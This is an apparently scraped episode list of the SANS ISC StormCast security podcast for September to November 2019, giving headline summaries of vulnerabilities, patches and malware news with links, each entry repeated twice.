Clam AV Vulnerability https://twitter.com/hackerfantastic/status/1190685521153937408 https://pastebin.com/cfP7X89m XCode Vulnerability https://support.apple.com/en-is/HT210729 MikroTik DNS Cache Poisoning https://blog.mikrotik.com/security/dns-cache-poisoning-vulnerability.html
11/5/20196 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, November 4th 2019

Critical Google Chrome Update Fixes Exploited Vulnerability https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html Blue Keep Vulnerability Mass Exploited to Install Crypto Coin Miner https://www.kryptoslogic.com/blog/2019/11/bluekeep-cve-2019-0708-exploitation-spotted-in-the-wild/ rConfig Vulnerabilities https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
11/4/20195 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, November 4th 2019

Critical Google Chrome Update Fixes Exploited Vulnerability https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html Blue Keep Vulnerability Mass Exploited to Install Crypto Coin Miner https://www.kryptoslogic.com/blog/2019/11/bluekeep-cve-2019-0708-exploitation-spotted-in-the-wild/ rConfig Vulnerabilities https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
11/4/20195 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, November 1st 2019

Phishing Made Easy With EML Files and Outlook 365 https://isc.sans.edu/forums/diary/EML+attachments+in+O365+a+recipe+for+phishing/25474/ Microsoft TLS Security Enhancements Lead to Timeouts https://support.microsoft.com/en-us/help/4528489/transport-layer-security-tls-connections-might-intermittently-fail-or MESSAGETAP: Who's Reading Your Text Messages https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html Amazon Authentication Failure for 3rd Party Devices https://old.reddit.com/r/sysadmin/comments/dpbt3t/the_perils_of_security_and_how_i_finally_resolved/
11/1/20195 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, November 1st 2019

Phishing Made Easy With EML Files and Outlook 365 https://isc.sans.edu/forums/diary/EML+attachments+in+O365+a+recipe+for+phishing/25474/ Microsoft TLS Security Enhancements Lead to Timeouts https://support.microsoft.com/en-us/help/4528489/transport-layer-security-tls-connections-might-intermittently-fail-or MESSAGETAP: Who's Reading Your Text Messages https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html Amazon Authentication Failure for 3rd Party Devices https://old.reddit.com/r/sysadmin/comments/dpbt3t/the_perils_of_security_and_how_i_finally_resolved/
11/1/20195 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, October 31st 2019

Apple Security Updates Details Released https://support.apple.com/en-us/HT201222 Untitled Goose Deserialization https://pulsesecurity.co.nz/advisories/untitled-goose-game-deserialization Insecure Pagers Leak Medical Data https://techcrunch.com/2019/10/30/nhs-pagers-medical-health-data/ Kibana Vulnerablity https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
10/31/20196 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, October 31st 2019

Apple Security Updates Details Released https://support.apple.com/en-us/HT201222 Untitled Goose Deserialization https://pulsesecurity.co.nz/advisories/untitled-goose-game-deserialization Insecure Pagers Leak Medical Data https://techcrunch.com/2019/10/30/nhs-pagers-medical-health-data/ Kibana Vulnerablity https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
10/31/20196 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, October 30th 2019

xHelper Android Malware https://www.symantec.com/blogs/threat-intelligence/xhelper-android-malware Counterstrike Game Keys Used for Money Laundry https://blog.counter-strike.net/index.php/2019/10/26113/ Greating PCAP Files From YAML https://isc.sans.edu/forums/diary/Generating+PCAP+Files+from+YAML/25464/
10/30/20195 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, October 30th 2019

xHelper Android Malware https://www.symantec.com/blogs/threat-intelligence/xhelper-android-malware Counterstrike Game Keys Used for Money Laundry https://blog.counter-strike.net/index.php/2019/10/26113/ Greating PCAP Files From YAML https://isc.sans.edu/forums/diary/Generating+PCAP+Files+from+YAML/25464/
10/30/20195 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, October 29th 2019

PHP 7 Remote Code Execution Vulnerability Exploited https://lab.wallarm.com/php-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/ https://github.com/neex/phuip-fpizdam Finding Shellcode with scdbg https://isc.sans.edu/forums/diary/Using+scdbg+to+Find+Shellcode/25460/ Apple iOS / tvOS / Safari Updates https://support.apple.com/en-us/HT201222 Sextortion Attempts Are Targeting Blogs https://www.bleepingcomputer.com/news/security/blogger-and-wordpress-sites-hacked-to-show-sextortion-scams/
10/29/20194 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, October 29th 2019

PHP 7 Remote Code Execution Vulnerability Exploited https://lab.wallarm.com/php-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/ https://github.com/neex/phuip-fpizdam Finding Shellcode with scdbg https://isc.sans.edu/forums/diary/Using+scdbg+to+Find+Shellcode/25460/ Apple iOS / tvOS / Safari Updates https://support.apple.com/en-us/HT201222 Sextortion Attempts Are Targeting Blogs https://www.bleepingcomputer.com/news/security/blogger-and-wordpress-sites-hacked-to-show-sextortion-scams/
10/29/20194 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, October 28th 2019

Odd Double Base64 Endoded "BS_REAL_IP" Header https://isc.sans.edu/forums/diary/Unusual+Activity+with+Double+Base64+Encoding/25458/ DNS Archeology With PowerShell https://isc.sans.edu/forums/diary/More+on+DNS+Archeology+with+PowerShell/25452/ iOS Appstore Malware https://www.wandera.com/mobile-security/ios-trojan-malware/ British Law Enforcement Misses Malware Reports Due to Anti-Malware https://www.theregister.co.uk/2019/10/24/hmicfrs_report_cyber_crime/
10/28/20195 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, October 28th 2019

Odd Double Base64 Endoded "BS_REAL_IP" Header https://isc.sans.edu/forums/diary/Unusual+Activity+with+Double+Base64+Encoding/25458/ DNS Archeology With PowerShell https://isc.sans.edu/forums/diary/More+on+DNS+Archeology+with+PowerShell/25452/ iOS Appstore Malware https://www.wandera.com/mobile-security/ios-trojan-malware/ British Law Enforcement Misses Malware Reports Due to Anti-Malware https://www.theregister.co.uk/2019/10/24/hmicfrs_report_cyber_crime/
10/28/20195 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, October 25th 2019

XML External Entity Vuln in LSP4XML Affects Various Developer Tools https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/?preview=true Google Chrome Will Make "SameSite" Default https://blog.chromium.org/2019/10/developers-get-ready-for-new.html Leftover Gigamon Configurations https://isc.sans.edu/forums/diary/Your+Supply+Chain+Doesnt+End+At+Receiving+How+Do+You+Decommission+Network+Equipment/25448/
10/25/20196 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, October 25th 2019

XML External Entity Vuln in LSP4XML Affects Various Developer Tools https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/?preview=true Google Chrome Will Make "SameSite" Default https://blog.chromium.org/2019/10/developers-get-ready-for-new.html Leftover Gigamon Configurations https://isc.sans.edu/forums/diary/Your+Supply+Chain+Doesnt+End+At+Receiving+How+Do+You+Decommission+Network+Equipment/25448/
10/25/20196 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, October 24th 2019

FTC Issues SIM Swapping Guidance https://www.consumer.ftc.gov/blog/2019/10/sim-swap-scams-how-protect-yourself Discord Used as Info Stealer Backdoor https://www.bleepingcomputer.com/news/security/discord-turned-into-an-info-stealing-backdoor-by-new-malware/ Cisco Exploit Code https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-iosxe-rest-auth-bypass Tails 4.0 Released https://tails.boum.org/news/version_4.0/index.en.html
10/24/20195 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, October 24th 2019

FTC Issues SIM Swapping Guidance https://www.consumer.ftc.gov/blog/2019/10/sim-swap-scams-how-protect-yourself Discord Used as Info Stealer Backdoor https://www.bleepingcomputer.com/news/security/discord-turned-into-an-info-stealing-backdoor-by-new-malware/ Cisco Exploit Code https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-iosxe-rest-auth-bypass Tails 4.0 Released https://tails.boum.org/news/version_4.0/index.en.html
10/24/20195 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, October 23rd 2019

Testing TLS 1.3 And Supported Ciphers https://isc.sans.edu/forums/diary/Testing+TLSv13+and+supported+ciphers/25442/ Google Chrome 78 Released https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_22.html Firefox 70 Released https://www.mozilla.org/en-US/firefox/70.0/releasenotes/ Cache Poisoning DoS https://cpdos.org/
10/23/20197 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, October 23rd 2019

Testing TLS 1.3 And Supported Ciphers https://isc.sans.edu/forums/diary/Testing+TLSv13+and+supported+ciphers/25442/ Google Chrome 78 Released https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_22.html Firefox 70 Released https://www.mozilla.org/en-US/firefox/70.0/releasenotes/ Cache Poisoning DoS https://cpdos.org/
10/23/20197 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, October 22nd 2019

DNS over TLS Scans https://isc.sans.edu/forums/diary/Whats+up+with+TCP+853+DNS+over+TLS/25438/ NordVPN and Others Compromised https://techcrunch.com/2019/10/21/nordvpn-confirms-it-was-hacked/ https://twitter.com/hexdefined/status/1186106695073726466 Trend Micro Bypass http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt Realtek Linux Wifi Driver Buffer Overflow https://twitter.com/nicowaisman/status/1184864519316758535
10/22/20195 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, October 22nd 2019

DNS over TLS Scans https://isc.sans.edu/forums/diary/Whats+up+with+TCP+853+DNS+over+TLS/25438/ NordVPN and Others Compromised https://techcrunch.com/2019/10/21/nordvpn-confirms-it-was-hacked/ https://twitter.com/hexdefined/status/1186106695073726466 Trend Micro Bypass http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt Realtek Linux Wifi Driver Buffer Overflow https://twitter.com/nicowaisman/status/1184864519316758535
10/22/20195 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, October 21st 2019

Attacks Against NVMS-9000 DVR Web Vulnerability https://isc.sans.edu/forums/diary/Scanning+Activity+for+NVMS9000+Digital+Video+Recorder/25434/ Pixel 4 Face Unlock Works with Eyes Shut https://www.bbc.com/news/technology-50085630 Samsung Galaxy S10 Fingerprint Unlock Bug https://www.bbc.com/news/technology-50080586 Alexa/Google Home Phishing https://srlabs.de/bites/smart-spies/
10/21/20196 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, October 21st 2019

Attacks Against NVMS-9000 DVR Web Vulnerability https://isc.sans.edu/forums/diary/Scanning+Activity+for+NVMS9000+Digital+Video+Recorder/25434/ Pixel 4 Face Unlock Works with Eyes Shut https://www.bbc.com/news/technology-50085630 Samsung Galaxy S10 Fingerprint Unlock Bug https://www.bbc.com/news/technology-50080586 Alexa/Google Home Phishing https://srlabs.de/bites/smart-spies/
10/21/20196 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, October 18th 2019

Phishing E-Mail Spoofing SPF Protected Domain https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/ Purchased Domain Arrives with Paypal Accounts Linked to it https://www.theregister.co.uk/2019/10/17/paypal_account_domain/ Typosquatting Attacks Affect 2020 Presidential Election https://www.digitalshadows.com/blog-and-research/typosquatting-and-the-2020-u-s-presidential-election/ STI Student: Christopher Hurless Exploring Osquery, Fleet, and Elastic Stack as an Open-source solution to Endpoint Detection and Response https://www.sans.org/reading-room/whitepapers/detection/paper/39165
10/18/201916 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, October 18th 2019

Phishing E-Mail Spoofing SPF Protected Domain https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/ Purchased Domain Arrives with Paypal Accounts Linked to it https://www.theregister.co.uk/2019/10/17/paypal_account_domain/ Typosquatting Attacks Affect 2020 Presidential Election https://www.digitalshadows.com/blog-and-research/typosquatting-and-the-2020-u-s-presidential-election/ STI Student: Christopher Hurless Exploring Osquery, Fleet, and Elastic Stack as an Open-source solution to Endpoint Detection and Response https://www.sans.org/reading-room/whitepapers/detection/paper/39165
10/18/201916 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, October 17th 2019

Oracle CPU https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html Jackson-Databind Vulnerablity https://github.com/FasterXML/jackson-databind/issues/2387 VMWare Cloud Foundation and VMware Harbor Container Registry Patch https://www.vmware.com/security/advisories/VMSA-2019-0016.html Wordpress Update https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ Cryptominers Hiding in WAV Files https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
10/17/20195 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, October 17th 2019

Oracle CPU https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html Jackson-Databind Vulnerablity https://github.com/FasterXML/jackson-databind/issues/2387 VMWare Cloud Foundation and VMware Harbor Container Registry Patch https://www.vmware.com/security/advisories/VMSA-2019-0016.html Wordpress Update https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ Cryptominers Hiding in WAV Files https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
10/17/20195 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, October 16th 2019

Adobe Updates https://helpx.adobe.com/security.html Symantec BSOD https://support.symantec.com/us/en/article.TECH256643.html OSX/Shlayer Bypasses Gatekeeper/XProtect https://blog.confiant.com/osx-shlayer-new-shurprise-unveiling-osx-tarmac-f965a32de887 Fake iOS Jailbreak Leads to Clickfraud https://blog.talosintelligence.com/2019/10/checkrain-click-fraud.html
10/16/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, October 16th 2019

Adobe Updates https://helpx.adobe.com/security.html Symantec BSOD https://support.symantec.com/us/en/article.TECH256643.html OSX/Shlayer Bypasses Gatekeeper/XProtect https://blog.confiant.com/osx-shlayer-new-shurprise-unveiling-osx-tarmac-f965a32de887 Fake iOS Jailbreak Leads to Clickfraud https://blog.talosintelligence.com/2019/10/checkrain-click-fraud.html
10/16/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, October 15th 2019

sudo vulnerability https://www.sudo.ws/alerts/minus_1_uid.html Apple Safebrowsing Controversy https://blog.cryptographyengineering.com/2019/10/13/dear-apple-safe-browsing-might-not-be-that-safe/ Streaming Service Tracking Behaviour https://www.princeton.edu/~pmittal/publications/tv-tracking-ccs19.pdf
10/15/20196 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, October 15th 2019

sudo vulnerability https://www.sudo.ws/alerts/minus_1_uid.html Apple Safebrowsing Controversy https://blog.cryptographyengineering.com/2019/10/13/dear-apple-safe-browsing-might-not-be-that-safe/ Streaming Service Tracking Behaviour https://www.princeton.edu/~pmittal/publications/tv-tracking-ccs19.pdf
10/15/20196 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, October 14th 2019

YARA Update https://isc.sans.edu/forums/diary/YARA+v3110+released/25408/ Hacking Back Against Ransomware https://www.zdnet.com/article/white-hat-hacks-muhstik-ransomware-gang-and-releases-decryption-keys/ Fake Crypto Trading Software https://www.bleepingcomputer.com/news/security/attackers-create-elaborate-crypto-trading-scheme-to-install-malware/
10/14/20193 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, October 14th 2019

YARA Update https://isc.sans.edu/forums/diary/YARA+v3110+released/25408/ Hacking Back Against Ransomware https://www.zdnet.com/article/white-hat-hacks-muhstik-ransomware-gang-and-releases-decryption-keys/ Fake Crypto Trading Software https://www.bleepingcomputer.com/news/security/attackers-create-elaborate-crypto-trading-scheme-to-install-malware/
10/14/20193 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, October 11th 2019

Mining Live Networks for OUI Data Oddness https://isc.sans.edu/forums/diary/Mining+Live+Networks+for+OUI+Data+Oddness/25404/ iTerm2 Vulnerability https://groups.google.com/forum/#!topic/iterm2-discuss/57k_AuLdQa4 Apple Updater Exploited in Bitpaymer Campaign https://blog.morphisec.com/apple-zero-day-exploited-in-bitpaymer-campaign
10/11/20196 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, October 11th 2019

Mining Live Networks for OUI Data Oddness https://isc.sans.edu/forums/diary/Mining+Live+Networks+for+OUI+Data+Oddness/25404/ iTerm2 Vulnerability https://groups.google.com/forum/#!topic/iterm2-discuss/57k_AuLdQa4 Apple Updater Exploited in Bitpaymer Campaign https://blog.morphisec.com/apple-zero-day-exploited-in-bitpaymer-campaign
10/11/20196 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, October 10th 2019

What Data Does Vidar Malware Steal https://isc.sans.edu/forums/diary/What+data+does+Vidar+malware+steal+from+an+infected+host/25398/ NTLM MIC Bypass https://www.preempt.com/blog/drop-the-mic-2-active-directory-open-to-more-ntlm-attacks/ Threats on Google Play https://news.drweb.com/show/review/?i=13446#google
10/10/20195 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, October 10th 2019

What Data Does Vidar Malware Steal https://isc.sans.edu/forums/diary/What+data+does+Vidar+malware+steal+from+an+infected+host/25398/ NTLM MIC Bypass https://www.preempt.com/blog/drop-the-mic-2-active-directory-open-to-more-ntlm-attacks/ Threats on Google Play https://news.drweb.com/show/review/?i=13446#google
10/10/20195 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, October 9th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2019+Patch+Tuesday/25396/ Android Update https://source.android.com/security/bulletin/2019-10-01 vBulletin Update https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4423646-vbulletin-5-5-x-5-5-2-5-5-3-and-5-5-4-security-patch-level-2
10/9/20195 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, October 9th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2019+Patch+Tuesday/25396/ Android Update https://source.android.com/security/bulletin/2019-10-01 vBulletin Update https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4423646-vbulletin-5-5-x-5-5-2-5-5-3-and-5-5-4-security-patch-level-2
10/9/20195 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, October 8th 2019

Cloudflare Warp + NordVPN on iOS Leads to Traffic in the Clear https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ WhatsApp Bug https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ MacOS Catalina and Safari Update Released https://www.macrumors.com/2019/10/07/apple-releases-macos-catalina/ https://support.apple.com/en-us/HT201222 (nothing new yet) Magecart Still Going Strong https://www.theregister.co.uk/2019/10/04/magecart/ (original RiskIQ report requires Registration)
10/8/20196 minutes
Episode Artwork

ISC StormCast for Tuesday, October 8th 2019

Cloudflare Warp + NordVPN on iOS Leads to Traffic in the Clear https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ WhatsApp Bug https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ MacOS Catalina and Safari Update Released https://www.macrumors.com/2019/10/07/apple-releases-macos-catalina/ https://support.apple.com/en-us/HT201222 (nothing new yet) Magecart Still Going Strong https://www.theregister.co.uk/2019/10/04/magecart/ (original RiskIQ report requires Registration)
10/8/20196 minutes
Episode Artwork

ISC StormCast for Monday, October 7th 2019

visNetwork for Network Data https://isc.sans.edu/forums/diary/visNetwork+for+Network+Data/25390/ Android Priv. Escalation Vulnerability Exploited in the Wild https://bugs.chromium.org/p/project-zero/issues/detail?id=1942 Signal Evesdropping Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1943
10/7/20195 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, October 7th 2019

visNetwork for Network Data https://isc.sans.edu/forums/diary/visNetwork+for+Network+Data/25390/ Android Priv. Escalation Vulnerability Exploited in the Wild https://bugs.chromium.org/p/project-zero/issues/detail?id=1942 Signal Evesdropping Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1943
10/7/20195 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, October 4th 2019

Last Files Ransomware is Back With New Ruse https://isc.sans.edu/forums/diary/LostFiles+Ransomware/25382/ tcpdump vulnerabilities https://www.tcpdump.org/tcpdump-changes.txt TLS Manipulating Malware https://securelist.com/compfun-successor-reductor/93633/ Luasz Cyra: Pass the Hash in Windows 10 https://www.sans.org/reading-room/whitepapers/testing/paper/39170
10/4/201915 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, October 4th 2019

Last Files Ransomware is Back With New Ruse https://isc.sans.edu/forums/diary/LostFiles+Ransomware/25382/ tcpdump vulnerabilities https://www.tcpdump.org/tcpdump-changes.txt TLS Manipulating Malware https://securelist.com/compfun-successor-reductor/93633/ Luasz Cyra: Pass the Hash in Windows 10 https://www.sans.org/reading-room/whitepapers/testing/paper/39170
10/4/201915 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, October 3rd 2019

Latest Emotet News https://isc.sans.edu/forums/diary/A+recent+example+of+Emotet+malspam/25378/ SANS Ouch! Newsletter https://www.sans.org/security-awareness-training/resources/four-simple-steps-staying-secure XPdf and Foxit Updates https://www.foxitsoftware.com/support/security-bulletins.php https://forum.xpdfreader.com/viewtopic.php?f=3&t=41885 eFax Malspam https://www.heise.de/security/meldung/Achtung-Angebliches-eFax-birgt-Trojaner-4544386.html Office 365 Idle Timeout https://docs.microsoft.com/en-us/sharepoint/sign-out-inactive-users https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=55183
10/3/20195 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, October 3rd 2019

Latest Emotet News https://isc.sans.edu/forums/diary/A+recent+example+of+Emotet+malspam/25378/ SANS Ouch! Newsletter https://www.sans.org/security-awareness-training/resources/four-simple-steps-staying-secure XPdf and Foxit Updates https://www.foxitsoftware.com/support/security-bulletins.php https://forum.xpdfreader.com/viewtopic.php?f=3&t=41885 eFax Malspam https://www.heise.de/security/meldung/Achtung-Angebliches-eFax-birgt-Trojaner-4544386.html Office 365 Idle Timeout https://docs.microsoft.com/en-us/sharepoint/sign-out-inactive-users https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=55183
10/3/20195 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, October 2nd 2019

PDF Encryption Flaw https://web-in-security.blogspot.com/2019/09/pdfex-major-security-flaws-in-pdf.html Windows 7 Security Updates Beyond 2020 https://www.microsoft.com/en-us/microsoft-365/blog/2019/10/01/windows-small-midsize-businesses-stay-secure-current/ ODT Documents Used to Distribute Malware https://blog.talosintelligence.com/2019/09/odt-malware-twist.html
10/2/20196 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, October 2nd 2019

PDF Encryption Flaw https://web-in-security.blogspot.com/2019/09/pdfex-major-security-flaws-in-pdf.html Windows 7 Security Updates Beyond 2020 https://www.microsoft.com/en-us/microsoft-365/blog/2019/10/01/windows-small-midsize-businesses-stay-secure-current/ ODT Documents Used to Distribute Malware https://blog.talosintelligence.com/2019/09/odt-malware-twist.html
10/2/20196 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, October 1st 2019

Maldoc, PowerShell and BITS https://isc.sans.edu/forums/diary/Maldoc+PowerShell+BITS/25372/ Yet Another Critical Exim Flaw https://nvd.nist.gov/vuln/detail/CVE-2019-16928 CISCO Introduces Semianual Patch Day https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-72547 Windows 2019 to make it easier to disable legacy TLS Versions https://www.microsoft.com/security/blog/2019/09/30/tls-version-enforcement-capabilities-now-available-certificate-binding-windows-server-2019
10/1/20194 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, October 1st 2019

Maldoc, PowerShell and BITS https://isc.sans.edu/forums/diary/Maldoc+PowerShell+BITS/25372/ Yet Another Critical Exim Flaw https://nvd.nist.gov/vuln/detail/CVE-2019-16928 CISCO Introduces Semianual Patch Day https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-72547 Windows 2019 to make it easier to disable legacy TLS Versions https://www.microsoft.com/security/blog/2019/09/30/tls-version-enforcement-capabilities-now-available-certificate-binding-windows-server-2019
10/1/20194 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, September 30th 2019

Polycom Scans https://isc.sans.edu/forums/diary/New+Scans+for+Polycom+Autoconfiguration+Files/25366/ Apple Security Details https://support.apple.com/en-us/HT201222 iOS Jailbreak https://github.com/axi0mX/ipwndfu
9/30/20195 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, September 30th 2019

Polycom Scans https://isc.sans.edu/forums/diary/New+Scans+for+Polycom+Autoconfiguration+Files/25366/ Apple Security Details https://support.apple.com/en-us/HT201222 iOS Jailbreak https://github.com/axi0mX/ipwndfu
9/30/20195 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, September 27th 2019

vBulletin Botnet https://twitter.com/bad_packets/status/1177256656322695168 Cisco Industrial Router Security Bulletin https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190925-ios-gos-auth Sniffle Bluetooth Sniffer https://github.com/nccgroup/sniffle Outlook on the web blocking more extensions https://techcommunity.microsoft.com/t5/Exchange-Team-Blog/Changes-to-File-Types-Blocked-in-Outlook-on-the-web/ba-p/874451
9/27/20195 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, September 27th 2019

vBulletin Botnet https://twitter.com/bad_packets/status/1177256656322695168 Cisco Industrial Router Security Bulletin https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190925-ios-gos-auth Sniffle Bluetooth Sniffer https://github.com/nccgroup/sniffle Outlook on the web blocking more extensions https://techcommunity.microsoft.com/t5/Exchange-Team-Blog/Changes-to-File-Types-Blocked-in-Outlook-on-the-web/ba-p/874451
9/27/20195 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, September 26th 2019

Malspam Pushing Quasar RAT https://isc.sans.edu/forums/diary/Malspam+pushing+Quasar+RAT/25354/ vBulletin 0-Day Exploit Update https://www.bleepingcomputer.com/news/security/vbulletin-zero-day-exploited-for-years-gets-unofficial-patch/ Fake Veteran Employment Site https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html
9/26/20194 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, September 26th 2019

Malspam Pushing Quasar RAT https://isc.sans.edu/forums/diary/Malspam+pushing+Quasar+RAT/25354/ vBulletin 0-Day Exploit Update https://www.bleepingcomputer.com/news/security/vbulletin-zero-day-exploited-for-years-gets-unofficial-patch/ Fake Veteran Employment Site https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html
9/26/20194 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, September 25th 2019

Remotewebaccess.com Domain in Certificate Transparency Logs https://isc.sans.edu/forums/diary/Huge+Amount+of+remotewebaccesscom+Sites+Found+in+Certificate+Transparency+Logs/25352/ Adobe Releases Emergency ColdFusion Patch https://blogs.adobe.com/psirt/?p=1789 Apple Releases Additional Updates for iOS/iPadOS https://support.apple.com/en-us/HT201222 vBulletin Vulnerability 0-Day Exploit Released https://seclists.org/fulldisclosure/2019/Sep/31
9/25/20195 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, September 25th 2019

Remotewebaccess.com Domain in Certificate Transparency Logs https://isc.sans.edu/forums/diary/Huge+Amount+of+remotewebaccesscom+Sites+Found+in+Certificate+Transparency+Logs/25352/ Adobe Releases Emergency ColdFusion Patch https://blogs.adobe.com/psirt/?p=1789 Apple Releases Additional Updates for iOS/iPadOS https://support.apple.com/en-us/HT201222 vBulletin Vulnerability 0-Day Exploit Released https://seclists.org/fulldisclosure/2019/Sep/31
9/25/20195 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, September 24th 2019

Microsoft Releases Special Patch for Exploited Vulnerability in Internet Explorer https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1367 Cloudflare Adding "Bot Fight" option https://blog.cloudflare.com/cleaning-up-bad-bots/ iOS Bluetooth Access Feature https://www.theverge.com/2019/9/19/20867286/ios-13-bluetooth-permission-privacy-feature-apps Forcepoint VPN Update https://support.forcepoint.com/KBArticle?id=000017525
9/24/20195 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, September 24th 2019

Microsoft Releases Special Patch for Exploited Vulnerability in Internet Explorer https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1367 Cloudflare Adding "Bot Fight" option https://blog.cloudflare.com/cleaning-up-bad-bots/ iOS Bluetooth Access Feature https://www.theverge.com/2019/9/19/20867286/ios-13-bluetooth-permission-privacy-feature-apps Forcepoint VPN Update https://support.forcepoint.com/KBArticle?id=000017525
9/24/20195 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, September 23rd 2019

